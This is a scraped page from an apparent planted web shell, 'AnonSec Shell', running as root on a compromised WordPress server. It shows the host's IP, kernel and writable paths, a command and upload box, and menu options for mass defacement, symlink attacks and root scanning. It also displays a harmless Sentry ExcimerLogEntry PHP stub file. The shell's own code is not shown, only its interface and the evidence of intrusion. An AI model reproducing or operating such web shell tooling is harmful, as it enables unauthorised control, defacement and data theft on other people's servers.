AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.145.81.9   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/vendor/godaddy/mwc-core/vendor/sentry/sentry/stubs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/vendor/godaddy/mwc-core/vendor/sentry/sentry/stubs/ExcimerLogEntry.stub
<?php

namespace {

    class ExcimerLogEntry
    {
        /**
         * ExcimerLogEntry is not constructible by user code.
         */
        private final function __construct()
        {
        }

        /**
         * Get the time at which the event occurred. This is the floating point
         * number of seconds since the ExcimerProfiler object was constructed.
         *
         * @return float
         */
        public function getTimestamp()
        {
        }

        /**
         * Get the event count represented by this log entry. This will typically
         * be 1. If there were overruns, it will be 1 plus the number of overruns.
         *
         * @return int
         */
        public function getEventCount()
        {
        }

        /**
         * Get an array of associative arrays describing the stack trace at the time
         * of the event. The first element in the array is the function which was
         * executing, the second function is the caller (parent) of that function,
         * and so on. Each element is an associative array with the following
         * optional fields:
         *
         *   - file: The filename in which the function appears
         *   - line: The exact line number at which the event occurred.
         *   - class: The class name in which the method is defined
         *   - function: The name of the function or method
         *   - closure_line: The line number at which the closure was defined
         *
         * @return array<int, array{
         *     file: string,
         *     line: int,
         *     class?: string,
         *     function?: string,
         *     closure_line?: int,
         * }>
         */
        public function getTrace(): array
        {
        }
    }

}

Anon7 - 2022
AnonSec Team